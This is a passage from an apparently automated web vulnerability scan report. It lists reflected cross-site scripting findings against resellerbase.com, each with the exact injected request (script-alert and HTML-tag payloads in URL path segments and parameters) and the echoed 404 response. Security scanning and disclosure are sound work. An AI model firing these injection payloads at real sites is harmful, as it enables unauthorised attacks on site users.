<p>The requested URL /detail/39/themes/kosmosccc88<script>alert(1)</script>f80bb03a5a7/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2682. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/4half.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b9bb8<script>alert(1)</script>cab73711af8 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmos/imagesb9bb8<script>alert(1)</script>cab73711af8/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/imagesb9bb8<script>alert(1)</script>cab73711af8/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2683. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/4half.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload a3e9d<script>alert(1)</script>933f21d39c6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmos/images/ratinga3e9d<script>alert(1)</script>933f21d39c6/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/images/ratinga3e9d<script>alert(1)</script>933f21d39c6/4half.gif was not found on this server.</p>
...[SNIP]...

2.2684. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/4half.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload d380c<script>alert(1)</script>abcd9a090a6 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmos/images/rating/4half.gifd380c<script>alert(1)</script>abcd9a090a6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/images/rating/4half.gifd380c<script>alert(1)</script>abcd9a090a6 was not found on this server.</p>
...[SNIP]...

2.2685. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/4half.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/images/rating/4half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d3cf1<script>alert(1)</script>fdb058b6ec2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmos/images/rating/4half.gif?d3cf1<script>alert(1)</script>fdb058b6ec2=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:33:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/images/rating/4half.gif?d3cf1<script>alert(1)</script>fdb058b6ec2=1 was not found on this server.</p>
...[SNIP]...

2.2686. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f8d1f<script>alert(1)</script>8971c5b1a4c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailf8d1f<script>alert(1)</script>8971c5b1a4c/39/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailf8d1f<script>alert(1)</script>8971c5b1a4c/39/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2687. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4b5fd<script>alert(1)</script>d98778ea083 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/394b5fd<script>alert(1)</script>d98778ea083/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/394b5fd<script>alert(1)</script>d98778ea083/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2688. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8ae4b<script>alert(1)</script>8154cfc848c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes8ae4b<script>alert(1)</script>8154cfc848c/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes8ae4b<script>alert(1)</script>8154cfc848c/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2689. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload dde3d<script>alert(1)</script>a2e2514537c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmosdde3d<script>alert(1)</script>a2e2514537c/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmosdde3d<script>alert(1)</script>a2e2514537c/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2690. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 25431<script>alert(1)</script>355fc1152f8 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmos/images25431<script>alert(1)</script>355fc1152f8/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/images25431<script>alert(1)</script>355fc1152f8/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2691. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload c5f5d<script>alert(1)</script>ace72427308 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmos/images/ratingc5f5d<script>alert(1)</script>ace72427308/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/images/ratingc5f5d<script>alert(1)</script>ace72427308/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2692. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 41c94<script>alert(1)</script>210d7eda8be was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmos/images/rating/search.php41c94<script>alert(1)</script>210d7eda8be?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/images/rating/search.php41c94<script>alert(1)</script>210d7eda8be?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2693. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload bd8b5<a>3abbc7142c6 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/39/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchbd8b5<a>3abbc7142c6&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchbd8b5<a>3abbc7142c6&opt=2 was not found on this server.</p>
...[SNIP]...

2.2694. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 95cc7<a>24cd80fed7d was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/39/themes/kosmos/images/rating/search.php?keyword=search...95cc7<a>24cd80fed7d&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/images/rating/search.php?keyword=search...95cc7<a>24cd80fed7d&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2695. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 76f2b<script>alert(1)</script>9b9358eeaf9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&76f2b<script>alert(1)</script>9b9358eeaf9=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&76f2b<script>alert(1)</script>9b9358eeaf9=1 was not found on this server.</p>
...[SNIP]...

2.2696. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload a3801<a>93bb5b9b50e was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/39/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2a3801<a>93bb5b9b50e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2a3801<a>93bb5b9b50e was not found on this server.</p>
...[SNIP]...

2.2697. http://www.resellerbase.com/detail/39/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 95944<script>alert(1)</script>16b629e8a9c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail95944<script>alert(1)</script>16b629e8a9c/39/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail95944<script>alert(1)</script>16b629e8a9c/39/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2698. http://www.resellerbase.com/detail/39/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9499d<script>alert(1)</script>660d596c67f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/399499d<script>alert(1)</script>660d596c67f/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/399499d<script>alert(1)</script>660d596c67f/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2699. http://www.resellerbase.com/detail/39/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 14aeb<script>alert(1)</script>5368a52ef70 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes14aeb<script>alert(1)</script>5368a52ef70/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

